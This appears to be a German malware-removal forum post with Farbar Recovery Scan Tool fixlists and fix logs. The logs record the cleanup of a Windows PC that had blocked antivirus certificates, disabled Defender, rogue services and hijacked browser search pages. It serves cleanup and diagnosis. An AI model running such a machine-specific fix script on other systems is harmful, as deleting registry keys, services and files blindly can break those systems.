Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         
FRST:
Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
